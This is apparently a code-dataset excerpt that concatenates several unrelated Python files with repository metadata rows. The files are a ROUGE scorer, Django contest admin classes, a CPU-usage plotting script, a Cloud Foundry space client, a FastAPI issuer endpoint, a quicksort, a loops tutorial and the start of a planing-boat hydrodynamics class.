            if self.apply_avg:
                # average model
                total_hypothesis_ngrams_count = 0
                total_reference_ngrams_count = 0
                total_ngrams_overlapping_count = 0

                for reference_sentences in references_sentences:
                    (
                        hypothesis_count,
                        reference_count,
                        overlapping_ngrams,
                    ) = Rouge._compute_ngrams_lcs(
                        hypothesis_sentences,
                        reference_sentences,
                        self.weight_factor if use_w else 1.0,
                    )
                    total_hypothesis_ngrams_count += hypothesis_count
                    total_reference_ngrams_count += reference_count
                    total_ngrams_overlapping_count += overlapping_ngrams

                score = Rouge._compute_p_r_f_score(
                    total_hypothesis_ngrams_count,
                    total_reference_ngrams_count,
                    total_ngrams_overlapping_count,
                    self.alpha,
                    self.weight_factor if use_w else 1.0,
                )
                for stat in Rouge.STATS:
                    scores[metric][stat] += score[stat]
            else:
                # Best model
                if self.apply_best:
                    best_current_score = None
                    best_current_score_wlcs = None
                    for reference_sentences in references_sentences:
                        (
                            hypothesis_count,
                            reference_count,
                            overlapping_ngrams,
                        ) = Rouge._compute_ngrams_lcs(
                            hypothesis_sentences,
                            reference_sentences,
                            self.weight_factor if use_w else 1.0,
                        )
                        # Fix: score each reference from its own counts.
                        # The original referenced the undefined total_*
                        # accumulators of the averaging branch, raising a
                        # NameError whenever apply_best was used.
                        score = Rouge._compute_p_r_f_score(
                            hypothesis_count,
                            reference_count,
                            overlapping_ngrams,
                            self.alpha,
                            self.weight_factor if use_w else 1.0,
                        )

                        if use_w:
                            reference_count_for_score = reference_count ** (
                                1.0 / self.weight_factor
                            )
                            overlapping_ngrams_for_score = overlapping_ngrams
                            score_wlcs = (
                                overlapping_ngrams_for_score / reference_count_for_score
                            ) ** (1.0 / self.weight_factor)

                            if (
                                best_current_score_wlcs is None
                                or score_wlcs > best_current_score_wlcs
                            ):
                                best_current_score = score
                                best_current_score_wlcs = score_wlcs
                        else:
                            if (
                                best_current_score is None
                                or score["r"] > best_current_score["r"]
                            ):
                                best_current_score = score

                    for stat in Rouge.STATS:
                        scores[metric][stat] += best_current_score[stat]
                # Keep all
                else:
                    for reference_sentences in references_sentences:
                        (
                            hypothesis_count,
                            reference_count,
                            overlapping_ngrams,
                        ) = Rouge._compute_ngrams_lcs(
                            hypothesis_sentences,
                            reference_sentences,
                            self.weight_factor if use_w else 1.0,
                        )
                        score = Rouge._compute_p_r_f_score(
                            hypothesis_count,
                            reference_count,
                            overlapping_ngrams,
                            self.alpha,
                            # Fix: mirror the other branches -- the weight
                            # factor only applies to ROUGE-W, otherwise
                            # plain ROUGE-L scores were wrongly re-weighted.
                            self.weight_factor if use_w else 1.0,
                        )
                        for stat in Rouge.STATS:
                            scores[metric][sample_id][stat].append(score[stat])

        # Compute the final score as the average (or max) across samples
        if (self.apply_avg or self.apply_best) and len(all_hypothesis) > 1:
            for stat in Rouge.STATS:
                scores[metric][stat] /= len(all_hypothesis)

        return scores

    def _preprocess_summary_as_a_whole(self, summary):
        """Truncate, normalize and tokenize a summary as one text block."""
        sentences = Rouge.split_into_sentences(summary)

        # Truncate
        if self.limit_length:
            # By words
            if self.length_limit_type == "words":
                summary = " ".join(sentences)
                all_tokens = summary.split()  # Counting as in the perls script
                summary = " ".join(all_tokens[: self.length_limit])

            # By bytes
            elif self.length_limit_type == "bytes":
                summary = ""
                current_len = 0
                for sentence in sentences:
                    sentence = sentence.strip()
                    sentence_len = len(sentence)

                    if current_len + sentence_len < self.length_limit:
                        if current_len != 0:
                            summary += " "
                        summary += sentence
                        current_len += sentence_len
                    else:
                        if current_len > 0:
                            summary += " "
                        summary += sentence[: self.length_limit - current_len]
                        break
        else:
            summary = " ".join(sentences)

        # Lowercase and strip everything but alphanumerics/Hangul
        summary = Rouge.REMOVE_CHAR_PATTERN.sub(" ", summary.lower()).strip()
        tokens = self.tokenize_text(Rouge.REMOVE_CHAR_PATTERN.sub(" ", summary))
        preprocessed_summary = [" ".join(tokens)]

        return preprocessed_summary

    def _preprocess_summary_per_sentence(self, summary):
        """Truncate, normalize and tokenize a summary sentence by sentence."""
        sentences = Rouge.split_into_sentences(summary)

        # Truncate
        if self.limit_length:
            final_sentences = []
            current_len = 0
            # By words
            if self.length_limit_type == "words":
                for sentence in sentences:
                    tokens = sentence.strip().split()
                    tokens_len = len(tokens)
                    if current_len + tokens_len < self.length_limit:
                        sentence = " ".join(tokens)
                        final_sentences.append(sentence)
                        current_len += tokens_len
                    else:
                        sentence = " ".join(tokens[: self.length_limit - current_len])
                        final_sentences.append(sentence)
                        break
            # By bytes
            elif self.length_limit_type == "bytes":
                for sentence in sentences:
                    sentence = sentence.strip()
                    sentence_len = len(sentence)
                    if current_len + sentence_len < self.length_limit:
                        final_sentences.append(sentence)
                        current_len += sentence_len
                    else:
                        sentence = sentence[: self.length_limit - current_len]
                        final_sentences.append(sentence)
                        break
            sentences = final_sentences

        final_sentences = []
        for sentence in sentences:
            sentence = Rouge.REMOVE_CHAR_PATTERN.sub(" ", sentence.lower()).strip()
            tokens = self.tokenize_text(Rouge.REMOVE_CHAR_PATTERN.sub(" ", sentence))
            sentence = " ".join(tokens)
            final_sentences.append(sentence)

        return final_sentences
| 38.625714 | 97 | 0.492529 | 26,614 | 0.983954 | 0 | 0 | 8,210 | 0.303534 | 0 | 0 | 1,510 | 0.055827 |
0dd358ad72eca9a8df86326685bf5bf8a52c322f | 717 | py | Python | algorithm_web/admin/contest.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | null | null | null | algorithm_web/admin/contest.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | 10 | 2019-03-15T05:12:23.000Z | 2020-05-06T13:05:49.000Z | algorithm_web/admin/contest.py | KMU-algolab/algorithm | 2b734978da78b936244580ed1febe4f9f6cf1aea | [
"MIT"
] | null | null | null | from django.contrib import admin
from .. import models
@admin.register(models.Contest)
class ContestAdmin(admin.ModelAdmin):
    """
    Admin page for contests (대회관리): schedule, host, and visibility info.
    """
    # Columns shown on the contest changelist page.
    list_display = ['contest_name', 'start_time', 'end_time', 'message', 'host_email', 'after_open']

    # NOTE(review): Django's ModelAdmin does not consume an inner
    # ``Meta.model`` (the model comes from ``admin.register``), so this
    # appears to be a no-op — confirm intent before removing.
    class Meta:
        model = models.Contest
@admin.register(models.ContestProblem)
class ContestProblemAdmin(admin.ModelAdmin):
    """
    Admin page for contest problems (대회 문제관리): maps problems to contests.
    """
    # Columns shown on the changelist page.
    list_display = ['contest', 'problem']

    # NOTE(review): ModelAdmin does not consume an inner ``Meta.model``;
    # this appears to be a no-op — confirm intent before removing.
    class Meta:
        model = models.ContestProblem
@admin.register(models.Participant)
class ParticipantAdmin(admin.ModelAdmin):
    """
    Admin page for contest participants (참가자관리).
    """
    # Columns shown on the changelist page.
    list_display = ['contest', 'participant']

    # NOTE(review): ModelAdmin does not consume an inner ``Meta.model``;
    # this appears to be a no-op — confirm intent before removing.
    class Meta:
        model = models.Participant
| 19.378378 | 100 | 0.658298 | 575 | 0.769746 | 0 | 0 | 682 | 0.912985 | 0 | 0 | 203 | 0.271754 |
0dd372748b3a10e7f2c3a966dab7085e18c12458 | 3,566 | py | Python | kubernetes_env/cpu_script.py | Kn99HN/tracing_env | 192d41d945aa1a642250ee1415a7a9babe7d2ba5 | [
"Apache-2.0"
] | null | null | null | kubernetes_env/cpu_script.py | Kn99HN/tracing_env | 192d41d945aa1a642250ee1415a7a9babe7d2ba5 | [
"Apache-2.0"
] | null | null | null | kubernetes_env/cpu_script.py | Kn99HN/tracing_env | 192d41d945aa1a642250ee1415a7a9babe7d2ba5 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python3
import seaborn as sns
import argparse
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
import pathlib
import pathlib
import kube_env
import kube_util as util
def _extract_field(col, field):
    """Return the value following "<field>:" and preceding the next "." in *col*."""
    start = col[col.find(field):].find(":") + col.find(field) + 1
    end = col[start:].find(".")
    return col[start:start + end]


def graph(title, csv_path, output):
    """Plot per-container and total CPU usage from a monitoring CSV export.

    Args:
        title: Title for the per-container subplot (previously this
            parameter was silently ignored and a hard-coded title used).
        csv_path: Path to the exported "CPU usage time [RATE]" CSV. Non-"Time"
            column headers are expected to embed ``pod_name:<pod>.`` and
            ``container_name:<name>.`` fragments.
        output: Path where the figure is saved.
    """
    df = pd.read_csv(csv_path)

    # Shorten the verbose exported headers to "<pod>_<container>".
    old_to_new_names = {}
    for col in df.columns:
        if col != "Time":
            old_to_new_names[col] = _extract_field(col, "pod_name") + "_" + _extract_field(col, "container_name")
    df.rename(columns=old_to_new_names, inplace=True)

    # Exported timestamps carry a 3-character prefix; keep the next 21
    # characters and parse them as datetimes.
    df["Time"] = df["Time"].str[3:]
    df["Time"] = df["Time"].str[:21]
    df["Time"] = pd.to_datetime(df["Time"], infer_datetime_format=True)

    fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(18, 6))

    # Per-container traces, converted from seconds of CPU per second to
    # milliseconds. Non-numeric cells (e.g. "undefined") become NaN instead
    # of surviving as strings (the old astype(errors='ignore') could leave
    # strings behind, which "*1000" would then repeat 1000 times).
    cols = []
    for col in df.columns:
        if col != "Time":
            cols.append(col)
            df[col] = pd.to_numeric(df[col], errors="coerce") * 1000  # change to milliseconds
            dplt = sns.lineplot(data=df, x="Time", y=col, ax=ax1)
    dplt.legend(labels=cols, bbox_to_anchor=(0.65, -0.2), loc='upper left', ncol=2, mode="expand", prop={'size': 6})
    dplt.set(ylabel="Milliseconds of CPU time used per second")
    # Honor the caller-supplied title (wired through from the -t CLI flag).
    dplt.set_title(title)

    # Total across containers. The per-container columns are already in
    # milliseconds, so no further scaling (the previous extra *1000 made
    # the total a thousand times too large for its axis label).
    df["cpu_all"] = df[cols].sum(axis=1)
    hplt = sns.lineplot(data=df, x="Time", y="cpu_all", ax=ax2)
    hplt.set(ylabel="Milliseconds of CPU time used per second")
    hplt.set_title("CPU Usage Of All Containers")

    plt.subplots_adjust(bottom=0.6, right=1)
    print("Saving to: ", output)
    plt.savefig(output)
def main(args):
    """Render the CPU-usage plot described by the parsed CLI arguments."""
    title, source, output = args.title, args.source, args.output
    return graph(title, source, output)
if __name__ == '__main__':
    # Build the CLI from a declarative option table: (short, long, default, help).
    cwd = pathlib.Path().absolute()
    option_specs = [
        ("-t", "--title", "CPU Usage By Container", "Specifies title of graph."),
        ("-s", "--source", f"{cwd}/Kubernetes_Container_-_CPU_usage_time_[RATE].csv", "Specifies source of data."),
        ("-o", "--output", "cpu_plot.png", "Specifies where graph is saved."),
    ]
    parser = argparse.ArgumentParser()
    for short_flag, long_flag, default, help_text in option_specs:
        parser.add_argument(short_flag,
                            long_flag,
                            dest=long_flag.lstrip("-"),
                            default=default,
                            help=help_text)
    main(parser.parse_args())
| 42.963855 | 124 | 0.530006 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 706 | 0.197981 |
0dd4787568192c17a9f65ae09cd6486c8711bd89 | 4,920 | py | Python | predix/admin/cf/spaces.py | Saifinbox/predix | d4a69da0adbc503fcf5d569e91c8ebb1aeac0605 | [
"BSD-3-Clause"
] | null | null | null | predix/admin/cf/spaces.py | Saifinbox/predix | d4a69da0adbc503fcf5d569e91c8ebb1aeac0605 | [
"BSD-3-Clause"
] | null | null | null | predix/admin/cf/spaces.py | Saifinbox/predix | d4a69da0adbc503fcf5d569e91c8ebb1aeac0605 | [
"BSD-3-Clause"
] | null | null | null |
import logging
import predix.admin.cf.api
import predix.admin.cf.orgs
import predix.admin.cf.apps
import predix.admin.cf.services
class Space(object):
    """
    Operations and data for Cloud Foundry Spaces.
    """
    def __init__(self, *args, **kwargs):
        super(Space, self).__init__(*args, **kwargs)
        self.api = predix.admin.cf.api.API()

        # Name and guid of the space currently targeted by the CF config.
        self.name = self.api.config.get_space_name()
        self.guid = self.api.config.get_space_guid()

        self.org = predix.admin.cf.orgs.Org()

    def _get_spaces(self):
        """
        Return the raw API response listing the spaces in the organization.

        (Docstring fixed: this lists spaces, not marketplace services.)
        """
        guid = self.api.config.get_organization_guid()
        uri = '/v2/organizations/%s/spaces' % (guid)
        return self.api.get(uri)

    def get_spaces(self):
        """
        Return a flat list of the names for spaces in the organization.

        The result is also cached on ``self.spaces``.
        """
        self.spaces = [resource['entity']['name']
                       for resource in self._get_spaces()['resources']]
        return self.spaces

    def get_space_services(self):
        """
        Returns the services available for use in the space. This may
        not always be the same as the full marketplace.
        """
        uri = '/v2/spaces/%s/services' % (self.guid)
        return self.api.get(uri)

    def create_space(self, space_name):
        """
        Create a new space of the given name in the current organization.
        """
        body = {
            'name': space_name,
            'organization_guid': self.api.config.get_organization_guid()
        }
        return self.api.post('/v2/spaces', body)

    def delete_space(self, space_name):
        """
        Delete the currently targeted space.

        NOTE(review): the ``space_name`` argument is accepted but ignored —
        the request always deletes ``self.guid`` (the configured space).
        Kept as-is for interface compatibility; confirm intent before
        changing.
        """
        return self.api.delete("/v2/spaces/%s" % (self.guid))

    def get_space_summary(self):
        """
        Returns a summary of apps and services within a given
        cloud foundry space.

        It is the call used by `cf s` or `cf a` for quicker
        responses.
        """
        uri = '/v2/spaces/%s/summary' % (self.guid)
        return self.api.get(uri)

    def _get_apps(self):
        """
        Returns raw results for all apps in the space.
        """
        uri = '/v2/spaces/%s/apps' % (self.guid)
        return self.api.get(uri)

    def get_apps(self):
        """
        Returns a list of the names of all of the apps in the space.
        """
        return [resource['entity']['name']
                for resource in self._get_apps()['resources']]

    def has_app(self, app_name):
        """
        Simple test to see if we have a name conflict
        for the application.
        """
        return app_name in self.get_apps()

    def _get_services(self):
        """
        Return the available services for this space.
        """
        uri = '/v2/spaces/%s/services' % (self.guid)
        return self.api.get(uri)

    def get_services(self):
        """
        Returns a flat list of the service names available
        from the marketplace for this space.
        """
        return [resource['entity']['label']
                for resource in self._get_services()['resources']]

    def _get_instances(self):
        """
        Returns the service instances activated in this space.
        """
        uri = '/v2/spaces/%s/service_instances' % (self.guid)
        return self.api.get(uri)

    def get_instances(self):
        """
        Returns a flat list of the names of services created
        in this space.
        """
        return [resource['entity']['name']
                for resource in self._get_instances()['resources']]

    def has_service_with_name(self, service_name):
        """
        Tests whether a service with the given name exists in
        this space.
        """
        return service_name in self.get_instances()

    def has_service_of_type(self, service_type):
        """
        Tests whether a service instance exists for the given
        service type (marketplace label).
        """
        summary = self.get_space_summary()
        return any(
            service_type == instance['service_plan']['service']['label']
            for instance in summary['services'])

    def purge(self):
        """
        Remove all services and apps from the space.

        Will leave the space itself, call delete_space() if you
        want to remove that too.

        Similar to `cf delete-space -f <space-name>`.
        """
        # logging.warn is a deprecated alias; logging.warning is the
        # documented spelling. Lazy %-args avoid eager formatting.
        logging.warning("Purging all services from space %s", self.name)

        service = predix.admin.cf.services.Service()
        for service_name in self.get_instances():
            service.purge(service_name)

        apps = predix.admin.cf.apps.App()
        for app_name in self.get_apps():
            apps.delete_app(app_name)
| 28.114286 | 76 | 0.57378 | 4,785 | 0.972561 | 0 | 0 | 0 | 0 | 0 | 0 | 2,045 | 0.41565 |
0dd5ea13d1486dc2358d111b35e9609c1546878c | 953 | py | Python | services/traction/api/endpoints/routes/v1/tenant/admin/issuer.py | bcgov/traction | 90cec4f1aebccd68eb986cb89dfae5819a07a2ee | [
"Apache-2.0"
] | 12 | 2022-01-29T20:30:03.000Z | 2022-03-29T11:46:14.000Z | services/traction/api/endpoints/routes/v1/tenant/admin/issuer.py | bcgov/traction | 90cec4f1aebccd68eb986cb89dfae5819a07a2ee | [
"Apache-2.0"
] | 38 | 2021-11-22T17:52:50.000Z | 2022-03-31T17:52:00.000Z | services/traction/api/endpoints/routes/v1/tenant/admin/issuer.py | bcgov/traction | 90cec4f1aebccd68eb986cb89dfae5819a07a2ee | [
"Apache-2.0"
] | 9 | 2021-11-22T18:05:48.000Z | 2022-03-29T11:25:08.000Z | import logging
from fastapi import APIRouter
from starlette import status
from api.endpoints.dependencies.tenant_security import get_from_context
from api.endpoints.models.v1.tenant import TenantGetResponse
from api.services.v1 import tenant_service
router = APIRouter()
logger = logging.getLogger(__name__)
@router.post(
"/make-issuer", status_code=status.HTTP_200_OK, response_model=TenantGetResponse
)
async def initialize_issuer() -> TenantGetResponse:
"""
If the innkeeper has authorized your tenant to become an issuer, initialize
here to write a endorsed public did the configured Hyperledger-Indy service
"""
wallet_id = get_from_context("TENANT_WALLET_ID")
tenant_id = get_from_context("TENANT_ID")
item = await tenant_service.make_issuer(
tenant_id,
wallet_id,
)
links = [] # TODO: determine useful links for /make-issuer
return TenantGetResponse(item=item, links=links)
| 26.472222 | 84 | 0.757608 | 0 | 0 | 0 | 0 | 636 | 0.667366 | 535 | 0.561385 | 261 | 0.273872 |
0dd723ba9c179cbdcdb30d82337ea92feb517a2e | 1,573 | py | Python | problems/sorting/quick_sort.py | colin-valentini/python-utils | 7bbbf6603c050291ee56df266257a351919f5e04 | [
"MIT"
] | null | null | null | problems/sorting/quick_sort.py | colin-valentini/python-utils | 7bbbf6603c050291ee56df266257a351919f5e04 | [
"MIT"
] | 1 | 2021-02-27T23:35:17.000Z | 2021-02-27T23:38:49.000Z | problems/sorting/quick_sort.py | colin-valentini/python | 7bbbf6603c050291ee56df266257a351919f5e04 | [
"MIT"
] | null | null | null |
def quick_sort(array):
    """Sort ``array`` in place with quicksort.

    Complexity:
        * Best/Average: O(n * log(n)) time | O(log(n)) space
        * Worst: O(n^2) time | O(log(n)) space
    """
    last = len(array) - 1
    return _quick_sort(array, 0, last)
def _quick_sort(array, start, end):
    """Recursively sort ``array[start:end + 1]`` in place."""
    # Sub-arrays of length zero or one are already sorted.
    if end <= start:
        return
    split = partition(array, start, end)
    _quick_sort(array, start, split - 1)
    _quick_sort(array, split + 1, end)
def partition(array, start, end):
    """Partition ``array[start:end + 1]`` around ``array[start]``.

    Returns the pivot's final index; smaller values end up to its left,
    larger values to its right.
    """
    pivot_value = array[start]
    lo, hi = start + 1, end
    while lo <= hi:
        # Both pointers sit on out-of-place values: exchange them.
        if array[lo] > pivot_value and array[hi] < pivot_value:
            swap(array, lo, hi)
        if array[lo] <= pivot_value:
            lo += 1
        if pivot_value <= array[hi]:
            hi -= 1
    # Drop the pivot between the two halves.
    swap(array, start, hi)
    return hi
def swap(array, i, j):
    """Exchange ``array[i]`` and ``array[j]`` in place; no-op when i == j.

    Raises:
        IndexError: if either index lies outside ``[0, len(array) - 1]``.
    """
    last = len(array) - 1
    if not 0 <= i <= last:
        raise IndexError(f'Index <i> of {i} is not a valid index of <array>')
    if not 0 <= j <= last:
        raise IndexError(f'Index <j> of {j} is not a valid index of <array>')
    if i != j:
        array[i], array[j] = array[j], array[i]
# Smoke tests: quick_sort must agree with Python's built-in sorted().
test_cases = [
    [],
    [3, 2],
    [2, 3, 1],
    [1, 2, 3],
    [33, 33, 33, 33, 33],
    [33, 33, 33, 33, 44],
    [16, 1, 53, 99, 16, 9, 100, 300, 12],
]

for case in test_cases:
    candidate = list(case)
    quick_sort(candidate)
    assert candidate == sorted(case)
0dd777da72c858ecb1ea267bb078c8de582008a6 | 1,618 | py | Python | learning_files/loops.py | MineJockey/python-basics | bd0370413362c69e55fc81366d8c995875f9308a | [
"MIT"
] | null | null | null | learning_files/loops.py | MineJockey/python-basics | bd0370413362c69e55fc81366d8c995875f9308a | [
"MIT"
] | null | null | null | learning_files/loops.py | MineJockey/python-basics | bd0370413362c69e55fc81366d8c995875f9308a | [
"MIT"
] | null | null | null | def loops():
# String Array
names = ["Apple", "Orange", "Pear"]
# \n is a newline in a string
print('\n---------------')
print(' For Each Loop')
print('---------------\n')
# For Each Loop
for i in names:
print(i)
print('\n---------------')
print(' For Loop')
print('---------------\n')
# For Loop
# the range() function can take a min, max, and interval
# value, max is non-inclusive i.e. 101 stops at 100
# example: range(0, 101, 2)
for i in range(5):
if i == 1:
print('1, continue')
# continue will move to the next iteration in the loop
continue
elif i == 3:
print('3, break')
# the break statement will end the loop
break
# if the number doesn't fit the conditions above
# it will be printed to the console
print(i)
print('\n---------------')
print(' While Loop')
print('---------------\n')
# Boolean variables hold True or False, 0 or 1
loop = True
# Integer variables hold whole numbers
iterations = 0
max_iterations = 10
print('0 -', max_iterations, '\n')
# The while loop will run as long as the given
# condition or variable is true
# Parentheses are optional
while loop:
# the += operator adds the given value to
# the current value of a variable
iterations += 1
print(iterations)
if iterations == max_iterations:
# break will end a loops execution
break
# Run the demo only when this file is executed as a script (not on import).
if __name__ == '__main__':
    loops()
| 25.68254 | 66 | 0.524722 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 893 | 0.551916 |
0dd779133e9d6620bb5632b19fd63b4c804181f6 | 52,299 | py | Python | openplaning/openplaning.py | elcf/python-openplaning | 58c5db7b2c42e951138430db883759b6143f4adc | [
"MIT"
] | 1 | 2021-12-17T00:30:40.000Z | 2021-12-17T00:30:40.000Z | openplaning/openplaning.py | AltamiroAJ/python-openplaning | 5dbb7ec83257173673651c098d8406c38f5c3bb8 | [
"MIT"
] | 1 | 2021-09-20T15:12:15.000Z | 2021-09-21T18:02:46.000Z | openplaning/openplaning.py | AltamiroAJ/python-openplaning | 5dbb7ec83257173673651c098d8406c38f5c3bb8 | [
"MIT"
] | 1 | 2021-12-17T00:30:42.000Z | 2021-12-17T00:30:42.000Z | import numpy as np
from scipy import interpolate, signal
from scipy.special import gamma
import ndmath
import warnings
import pkg_resources
class PlaningBoat():
"""Prismatic planing craft
Attributes:
speed (float): Speed (m/s). It is an input to :class:`PlaningBoat`.
weight (float): Weight (N). It is an input to :class:`PlaningBoat`.
beam (float): Beam (m). It is an input to :class:`PlaningBoat`.
lcg (float): Longitudinal center of gravity, measured from the stern (m). It is an input to :class:`PlaningBoat`.
vcg (float): Vertical center of gravity, measured from the keel (m). It is an input to :class:`PlaningBoat`.
r_g (float): Radius of gyration (m). It is an input to :class:`PlaningBoat`.
beta (float): Deadrise (deg). It is an input to :class:`PlaningBoat`.
epsilon (float): Thrust angle w.r.t. keel, CCW with body-fixed origin at 9 o'clock (deg). It is an input to :class:`PlaningBoat`.
vT (float): Thrust vertical distance, measured from keel, and positive up (m). It is an input to :class:`PlaningBoat`.
lT (float): Thrust horizontal distance, measured from stern, and positive forward (m). It is an input to :class:`PlaningBoat`.
length (float): Vessel LOA for seaway behavior estimates (m). Defaults to None. It is an input to :class:`PlaningBoat`.
H_sig (float): Significant wave heigth in an irregular sea state (m). Defaults to None. It is an input to :class:`PlaningBoat`.
ahr (float): Average hull roughness (m). Defaults to 150*10**-6. It is an input to :class:`PlaningBoat`.
Lf (float): Flap chord (m). Defaults to 0. It is an input to :class:`PlaningBoat`.
sigma (float): Flap span-beam ratio (dimensionless). Defaults to 0. It is an input to :class:`PlaningBoat`.
delta (float): Flap deflection (deg). Defaults to 0. It is an input to :class:`PlaningBoat`.
l_air (float): Distance from stern to center of air pressure (m). Defaults to 0. It is an input to :class:`PlaningBoat`.
h_air (float): Height from keel to top of square which bounds the air-drag-inducing area (m). Defaults to 0. It is an input to :class:`PlaningBoat`.
b_air (float): Transverse width of square which bounds the air-drag-inducing area (m). Defaults to 0. It is an input to :class:`PlaningBoat`.
C_shape (float): Area coefficient for air-drag-inducing area (dimensionless). C_shape = 1 means the air drag reference area is h_air*b_air. Defaults to 0. It is an input to :class:`PlaningBoat`.
C_D (float): Air drag coefficient (dimensionless). Defaults to 0.7. It is an input to :class:`PlaningBoat`.
rho (float): Water density (kg/m^3). Defaults to 1025.87. It is an input to :class:`PlaningBoat`.
nu (float): Water kinematic viscosity (m^2/s). Defaults to 1.19*10**-6. It is an input to :class:`PlaningBoat`.
rho_air (float): Air density (kg/m^3). Defaults to 1.225. It is an input to :class:`PlaningBoat`.
g (float): Gravitational acceleration (m/s^2). Defaults to 9.8066. It is an input to :class:`PlaningBoat`.
z_wl (float): Vertical distance of center of gravity to the calm water line (m). Defaults to 0. It is an input to :class:`PlaningBoat`, but modified when running :meth:`get_steady_trim`.
tau (float): Trim angle (deg). Defaults to 5. It is an input to :class:`PlaningBoat`, but modified when running :meth:`get_steady_trim`.
eta_3 (float): Additional heave (m). Initiates to 0.
eta_5 (float): Additional trim (deg). Initiates to zero.
wetted_lengths_type (int): 1 = Use Faltinsen 2005 wave rise approximation, 2 = Use Savitsky's '64 approach, 3 = Use Savitsky's '76 approach. Defaults to 1. It is an input to :class:`PlaningBoat`.
z_max_type (int): 1 = Uses 3rd order polynomial fit, 2 = Uses cubic interpolation from table. This is only used if wetted_lenghts_type == 1. Defaults to 1. It is an input to :class:`PlaningBoat`.
L_K (float): Keel wetted length (m). It is updated when running :meth:`get_geo_lengths`.
L_C (float): Chine wetted length (m). It is updated when running :meth:`get_geo_lengths`.
lambda_W (float): Mean wetted-length to beam ratio, (L_K+L_C)/(2*beam) (dimensionless). It is updated when running :meth:`get_geo_lengths`.
x_s (float): Distance from keel/water-line intersection to start of wetted chine (m). It is updated when running :meth:`get_geo_lengths`.
z_max (float): Maximum pressure coordinate coefficient, z_max/Ut (dimensionless). It is updated when running :meth:`get_geo_lengths`.
hydrodynamic_force ((3,) ndarray): Hydrodynamic force (N, N, N*m). [F_x, F_z, M_cg] with x, y, rot directions in intertial coordinates. It is updated when running :meth:`get_forces`.
skin_friction ((3,) ndarray): Skin friction force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
air_resistance ((3,) ndarray): Air resistance force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
flap_force ((3,) ndarray): Flap resultant force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
thrust_force ((3,) ndarray): Thrust resultant force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
net_force ((3,) ndarray): Net force (N, N, N*m). [F_x, F_z, M_cg]. It is updated when running :meth:`get_forces`.
mass_matrix ((2, 2) ndarray): Mass coefficients matrix. [[A_33 (kg), A_35 (kg*m/rad)], [A_53 (kg*m), A_55 (kg*m^2/rad)]]. It is updated when running :meth:`get_eom_matrices`.
damping_matrix ((2, 2) ndarray): Damping coefficients matrix. [[B_33 (kg/s), B_35 (kg*m/(s*rad))], [B_53 (kg*m/s), B_55 (kg*m**2/(s*rad))]]. It is updated when running :meth:`get_eom_matrices`.
restoring_matrix ((2, 2) ndarray): Restoring coefficients matrix. [[C_33 (N/m), C_35 (N/rad)], [C_53 (N), C_55 (N*m/rad)]]. It is updated when running :meth:`get_eom_matrices`.
porpoising (list): [[eigenvalue result (bool), est. pitch settling time (s)], [Savitsky chart result (bool), critical trim angle (deg)]]. It is updated when running :meth:`check_porpoising`.
seaway_drag_type (int): 1 = Use Savitsky's '76 approximation, 2 = Use Fridsma's '71 designs charts. Defaults to 1. It is an input to :class:`PlaningBoat`.
avg_impact_acc ((2,) ndarray): Average impact acceleration at center of gravity and bow (g's). [n_cg, n_bow]. It is updated when running :meth:`get_seaway_behavior`.
R_AW (float): Added resistance in waves (N). It is updated when running :meth:`get_seaway_behavior`.
"""
def __init__(self, speed, weight, beam, lcg, vcg, r_g, beta, epsilon, vT, lT, length=None, H_sig=None, ahr=150e-6, Lf=0, sigma=0, delta=0, l_air=0, h_air=0, b_air=0, C_shape=0, C_D=0.7, z_wl=0, tau=5, rho=1025.87, nu=1.19e-6, rho_air=1.225, g=9.8066, wetted_lengths_type=1, z_max_type=1, seaway_drag_type=1):
"""Initialize attributes for PlaningBoat
Args:
speed (float): Speed (m/s).
weight (float): Weidght (N).
beam (float): Beam (m).
lcg (float): Longitudinal center of gravity, measured from the stern (m).
vcg (float): Vertical center of gravity, measured from the keel (m).
r_g (float): Radius of gyration (m).
beta (float): Deadrise (deg).
epsilon (float): Thrust angle w.r.t. keel, CCW with body-fixed origin at 9 o'clock (deg).
vT (float): Thrust vertical distance, measured from keel, and positive up (m).
lT (float): Thrust horizontal distance, measured from stern, and positive forward (m).
length (float, optional): Vessel LOA for seaway behavior estimates (m). Defaults to None.
H_sig (float, optional): Significant wave heigth in an irregular sea state (m). Defaults to None.
ahr (float, optional): Average hull roughness (m). Defaults to 150*10**-6.
Lf (float, optional): Flap chord (m). Defaults to 0.
sigma (float, optional): Flap span-beam ratio (dimensionless). Defaults to 0.
delta (float, optional): Flap deflection (deg). Defaults to 0.
l_air (float, optional): Distance from stern to center of air pressure (m). Defaults to 0.
h_air (float, optional): Height from keel to top of square which bounds the air-drag-inducing area (m). Defaults to 0.
b_air (float, optional): Transverse width of square which bounds the air-drag-inducing area (m). Defaults to 0.
C_shape (float, optional): Area coefficient for air-drag-inducing area (dimensionless). C_shape = 1 means the air drag reference area is h_air*b_air. Defaults to 0.
C_D (float, optional): Air drag coefficient (dimensionless). Defaults to 0.7.
z_wl (float, optional): Vertical distance of center of gravity to the calm water line (m). Defaults to 0.
tau (float, optional): Trim angle (deg). Defaults to 5.
rho (float, optional): Water density (kg/m^3). Defaults to 1025.87.
nu (float, optional): Water kinematic viscosity (m^2/s). Defaults to 1.19*10**-6.
rho_air (float, optional): Air density (kg/m^3). Defaults to 1.225.
g (float, optional): Gravitational acceleration (m/s^2). Defaults to 9.8066.
wetted_lengths_type (int, optional): 1 = Use Faltinsen 2005 wave rise approximation, 2 = Use Savitsky's '64 approach, 3 = Use Savitsky's '76 approach. Defaults to 1.
z_max_type (int, optional): 1 = Uses 3rd order polynomial fit, 2 = Uses cubic interpolation from table. This is only used if wetted_lenghts_type == 1. Defaults to 1.
seaway_drag_type (int, optional): 1 = Use Savitsky's '76 approximation, 2 = Use Fridsma's '71 designs charts. Defaults to 1.
"""
self.speed = speed
self.weight = weight
self.beam = beam
self.lcg = lcg
self.vcg = vcg
self.r_g = r_g
self.beta = beta
self.epsilon = epsilon
self.vT = vT
